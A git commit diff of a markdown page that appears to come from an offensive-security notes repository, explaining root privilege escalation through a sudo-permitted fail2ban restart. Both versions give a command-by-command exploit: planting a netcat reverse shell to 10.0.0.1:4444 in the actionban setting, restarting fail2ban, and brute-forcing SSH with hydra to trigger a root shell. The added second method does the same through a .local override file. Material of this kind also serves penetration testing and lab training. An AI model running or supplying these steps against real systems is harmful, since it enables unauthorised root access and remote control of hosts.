src/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation.md, before:

---
title: Sudo Fail2ban Privilege Escalation
description: Sudo fail2ban command might be vulnerable to privilege escalation (PrivEsc).
tags:
    - Privilege Escalation
refs:
date: 2023-02-05
draft: false
---

**Fail2ban** is an intrusion prevention software framework.  
It prevents against brute force attacks.  

## Investigation

```sh
sudo -l

(root) NOPASSWD: /etc/init.d/fail2ban restart
```

If we can execute **"fail2ban"** as root, we can gain access to privileges by modifying the configuration file.  
We need to check if the config file is writable.

```sh
find /etc -writable -ls 2>/dev/null

4 drwxrwx--- 2 root security  4096 Oct 16 08:57 /etc/fail2ban/action.d
```

Look inside of **"/etc/fail2ban/jail.conf"** to know more about how fail2ban is configured.

```sh
less /etc/fail2ban/jail.conf

# ---------------------------------------------

# output

...
# "bantime" is the number of seconds that a host is banned.
bantime  = 10s

# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime  = 10s

# "maxretry" is the number of failures before a host get banned.
maxretry = 5
...
```

<br />

## Exploitation

### 1. Modify the Configuration File

For privilege escalation, we need to update the **"iptables-multiport.conf"**.  
Specifically, insert a payload to one of the following values.

- **actionstart**
- **actionstop**
- **actioncheck**
- **actionban**
- **actionunban**

Here update the value of **actionban** which triggers ban on multiple login attempts.  
Copy  **iptables-multiport.conf** to the current user's home directory.

```sh
ls -al /etc/fail2ban/action.d/iptables-multiport.conf
# copy this file into the home directory for editing the content
cp /etc/fail2ban/action.d/iptables-multiport.conf ~
```
Now modify the file.

```sh
vim ~/iptables-multiport.conf
```

We insert a reverse shell payload into the **actionban**.

```sh
actionban = /usr/bin/nc 10.0.0.1 4444 -e /bin/bash
```

Then move back the config file to the original one.

```sh
mv ~/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
```

To apply the new configuration, restart it as root.

```sh
sudo /etc/init.d/fail2ban restart
```

### 2. Trigger the Action

Start a listener in local machine.

```sh
nc -lvnp 4444
```

Try to login with the wrong passwords multiple times until we will get banned.  
So that to, **hydra** is useful.

```sh
hydra -l root -P passwords.txt <target-ip> ssh
```

After a short time, you will get a root shell via listener.

Commit message:

another method to escalate privileges when having write permission over conf.d directory

src/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation.md, after:

---
title: Sudo Fail2ban Privilege Escalation
description: Sudo fail2ban command might be vulnerable to privilege escalation (PrivEsc).
tags:
    - Privilege Escalation
refs:
date: 2023-02-05
draft: false
---

**Fail2ban** is an intrusion prevention software framework.  
It prevents against brute force attacks.  

## Investigation

```sh
sudo -l

(root) NOPASSWD: /etc/init.d/fail2ban restart
```

If we can execute **"fail2ban"** as root, we can gain access to privileges by modifying the configuration file.  
We need to check if the config file is writable.

```sh
find /etc -writable -ls 2>/dev/null

4 drwxrwx--- 2 root security  4096 Oct 16 08:57 /etc/fail2ban/action.d
```

Look inside of **"/etc/fail2ban/jail.conf"** to know more about how fail2ban is configured.

```sh
less /etc/fail2ban/jail.conf

# ---------------------------------------------

# output

...
# "bantime" is the number of seconds that a host is banned.
bantime  = 10s

# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime  = 10s

# "maxretry" is the number of failures before a host get banned.
maxretry = 5
...
```

<br />

## Exploitation

### 1. Modify the Configuration File

For privilege escalation, we need to update the **"iptables-multiport.conf"**.  
Specifically, insert a payload to one of the following values.

- **actionstart**
- **actionstop**
- **actioncheck**
- **actionban**
- **actionunban**

Here update the value of **actionban** which triggers ban on multiple login attempts.  

Method 1

Copy  **iptables-multiport.conf** to the current user's home directory.

```sh
ls -al /etc/fail2ban/action.d/iptables-multiport.conf
# copy this file into the home directory for editing the content
cp /etc/fail2ban/action.d/iptables-multiport.conf ~
```
Now modify the file.

```sh
vim ~/iptables-multiport.conf
```

We insert a reverse shell payload into the **actionban**.

```sh
actionban = /usr/bin/nc 10.0.0.1 4444 -e /bin/bash
```

Then move back the config file to the original one.

```sh
mv ~/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
```

Method 2

Fail2ban parses .local files in the action.d directory after the .conf files, and any settings in the .local files override user changes made in the .conf files.

```sh
# cp iptables-multiport.conf in the same directory with .local extension iptables-multiport.local
cp /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.local
```

We insert a reverse shell payload into the **actionban**.

```sh
actionban = /usr/bin/nc 10.0.0.1 4444 -e /bin/bash
```

To apply the new configuration, restart it as root.

```sh
sudo /etc/init.d/fail2ban restart
```

### 2. Trigger the Action

Start a listener in local machine.

```sh
nc -lvnp 4444
```

Try to login with the wrong passwords multiple times until we will get banned.  
So that to, **hydra** is useful.

```sh
hydra -l root -P passwords.txt <target-ip> ssh
```

After a short time, you will get a root shell via listener.
